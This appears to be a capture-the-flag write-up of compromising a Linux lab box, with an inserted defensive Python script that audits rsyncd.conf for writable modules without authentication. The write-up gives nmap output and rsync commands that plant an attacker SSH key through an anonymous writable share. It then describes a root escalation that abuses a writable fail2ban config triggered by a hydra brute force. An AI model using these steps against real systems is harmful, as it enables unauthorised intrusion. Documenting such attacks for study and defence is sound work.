First we start with an nmap scan:
nmap -sC -sV -T4 -oN nmap.txt <IP>
# Nmap 7.93 scan initiated Mon Dec 26 05:39:57 2022 as: nmap -sC -sV -T4 -oN quickmap.txt -Pn 192.168.108.126
Nmap scan report for 192.168.108.126
Host is up (0.15s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 74ba2023899262029fe73d3b83d4d96c (RSA)
| 256 548f79555ab03a695ad5723964fd074e (ECDSA)
|_ 256 7f5d102762ba75e9bcc84fe27287d4e2 (ED25519)
873/tcp open rsync (protocol version 31)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Dec 26 05:40:15 2022 -- 1 IP address (1 host up) scanned in 18.24 seconds
Nice, got 2 ports: ssh and rsync. Enumerating the rsync service on port 873 using an nmap script:
nmap -sV --script "rsync-list-modules" -p 873 <IP>
Got the share name; now check what is listed in the share without auth:
rsync -av --list-only rsync://<IP>/sharename
Tried to upload a file to the share and check:
touch shell
rsync shell <IP>::share
rsync -av --list-only rsync://<IP>/share
Worked. Attacking through an ssh key: created an authorized_keys file in a .ssh dir
and put my attacker id_rsa.pub key in that authorized_keys file.
Uploaded the .ssh dir into the share and listed it to confirm it is there:
rsync -r ./.ssh/ <IP>::share/.ssh
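The writable, unauthenticated rsync module is what made the upload above possible, and it is what a defender would want to catch in rsyncd.conf. The auditor below is an added example, not part of this writeup, and runs over a constructed sample config (not the box's real one); it flags modules that are writable without auth users, and additionally whether they run as root or lack a hosts allow restriction.

```python
"""Audit an rsyncd.conf for modules that accept unauthenticated writes."""
import configparser

# Constructed sample rsyncd.conf for the demo, not the target box's real config.
SAMPLE_RSYNCD_CONF = """\
uid = root

[share]
path = /home/fox
read only = no

[private]
path = /srv/private
read only = no
auth users = backupuser
secrets file = /etc/rsyncd.secrets
hosts allow = 10.0.0.0/8
"""

FALSE_VALUES = {"no", "false", "0"}


def parse_rsyncd_conf(text):
    """Return {module: options}; global options are inherited by every module."""
    cp = configparser.ConfigParser(interpolation=None, default_section="global")
    # rsyncd.conf puts globals before the first [module]; configparser needs a
    # section header there, so a synthetic [global] header is prepended.
    cp.read_string("[global]\n" + text)
    return {m: {k: v.strip() for k, v in cp[m].items()} for m in cp.sections()}


def audit_modules(modules):
    """Map each risky module name to the weaknesses found in it."""
    findings = {}
    for name, opts in modules.items():
        issues = []
        writable = opts.get("read only", "yes").lower() in FALSE_VALUES
        if writable and not opts.get("auth users"):
            issues.append("anonymous-write")      # any client can push files into path
            if opts.get("uid", "nobody").lower() in ("root", "0"):
                issues.append("runs-as-root")     # uploaded files are written as root
            if not opts.get("hosts allow"):
                issues.append("no-hosts-allow")   # reachable from any source address
        if issues:
            findings[name] = issues
    return findings


if __name__ == "__main__":
    for module, issues in audit_modules(parse_rsyncd_conf(SAMPLE_RSYNCD_CONF)).items():
        print(f"[{module}] {', '.join(issues)}")
```

Point it at a real /etc/rsyncd.conf by passing its contents to parse_rsyncd_conf; a module reported as anonymous-write plus runs-as-root is exactly the condition the upload in this writeup relied on.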
Now ssh into the box
Boom, I'm in… I place it under my genjitsu 😂. Proceed to escalate privs. By typing the cmd id, the user fox is in the fail2ban group, so I check online for escalating privs with it. First I check the fail2ban.conf:
The path above is writeable, so I edited it.
Checking the fail2ban.conf file, the ban time is 1 min and the attempts before ban is 2.
Now tried triggering it by brute-forcing ssh with hydra 🤠…
Boom, I got banned. Let's check the result of the ban action.
Boom!!! I got root 😎😎.